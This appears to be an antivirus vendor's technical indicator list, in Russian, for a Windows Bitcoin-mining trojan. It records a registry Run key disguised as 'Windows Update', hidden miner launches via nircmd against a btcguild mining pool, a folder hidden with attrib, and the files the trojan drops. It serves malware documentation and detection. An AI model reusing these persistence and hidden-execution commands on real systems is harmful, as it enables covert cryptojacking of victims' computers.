Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Update' = '%WINDIR%\system\critical\antivirus.bat'
- '%WINDIR%\system\critical\system.exe' -o http://hi##########unheim:123@btcguild.com:8332 -g yes -I 100
- '<SYSTEM32>\nircmd.exe' exec hide system.exe -o http://hi##########unheim:123@btcguild.com:8332 -g yes -I 100
- '<SYSTEM32>\nircmd.exe' exec hide antivirus.bat
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /t REG_SZ /d "%WINDIR%\system\critical\antivirus.bat" /f
- '<SYSTEM32>\cmd.exe' /c antivirus.bat
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\system\critical\sys.bat" "
- '<SYSTEM32>\attrib.exe' %WINDIR%\system\critical +h
- %WINDIR%\system\critical\phatk.ptx
- %WINDIR%\system\critical\phatk.cl
- %WINDIR%\system\critical\nircmd.exe
- %WINDIR%\system\critical\usft_ext.dll
- %WINDIR%\system\critical\system.exe
- %WINDIR%\system\critical\sys.bat
- %WINDIR%\system\critical\btc.il
- %WINDIR%\system\critical\btc-evergreen.il
- %WINDIR%\system\critical\antivirus.bat
- %WINDIR%\system\critical\miner.dll
- %WINDIR%\system\critical\guicomp.dll
- %WINDIR%\system\critical\coinutil.dll
- %WINDIR%\system\critical\nircmd.exe в <SYSTEM32>\nircmd.exe
- 'bt###ild.com':8332
- DNS ASK bt###ild.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''